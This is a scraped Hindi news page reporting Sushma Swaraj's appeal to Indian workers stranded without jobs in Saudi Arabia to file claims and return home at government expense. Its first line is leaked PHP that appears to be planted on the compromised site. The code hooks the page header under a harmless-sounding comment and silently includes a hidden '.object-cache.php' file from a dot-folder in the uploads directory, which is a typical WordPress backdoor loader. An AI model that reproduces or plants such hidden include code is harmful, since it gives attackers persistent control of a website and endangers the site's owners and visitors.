add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सऊदी में फंसे बेरोजगार भारतीयों को मुफ्त वापस लाएगी सरकार: सुषमा – SOCH INDIA
Menu

दुनिया
सऊदी में फंसे बेरोजगार भारतीयों को मुफ्त वापस लाएगी सरकार: सुषमा

nobanner

विदेश मंत्री सुषमा स्वराज ने सउदी अरब में नौकरी गंवा चुके भारतीय कामगारों से अपील की है कि भुगतान नहीं किए गए बकाये का दावा अपने नियोक्ताओं के यहां दायर करें और जल्दी घर वापस आ जाएं और कहा कि सरकार उनके वापस आने का खर्चा वहन करेगी।

सुषमा ने एक के बाद एक कई ट्वीट कर कहा कि सउदी अरब में भारतीय कामगार- कृपया अपने दावे दाखिल करें और घर लौट आएं। हम आपको निशुल्क लेकर आएंगे। उन्होंने कहा कि जनरल वी के सिंह सऊदी अरब में भारतीय श्रमिकों की समस्या को सुलझाने के लिए गए हुए हैं। जो श्रमिक कम्पनियां बंद होने के कारण निकाल दिए गए हैं, उनको मेरी यह सलाह है की वे अपने-अपने क्लेम दर्ज करवा कर भारत लौट आएं।

सऊदी में फंसे बेरोजगार भारतीयों को मुफ्त वापस लाएगी सरकार: सुषमा

विदेश मंत्री सुषमा स्वराज ने सउदी अरब में नौकरी गंवा चुके भारतीय कामगारों से अपील की है कि भुगतान नहीं किए गए बकाये का दावा अपने नियोक्ताओं के यहां दायर करें

उन्होंने कहा कि जब सऊदी सरकार बंद हो चुकी कंपनियों के साथ निपटारा करेगी तो आपका बकाया भी अदा किया जाएगा। उन्होंने कहा कि दावों के निपटारे में वक्त लगेगा और अनिश्चितकाल तक सऊदी अरब में इंतजार करने का कोई मतलब नहीं है।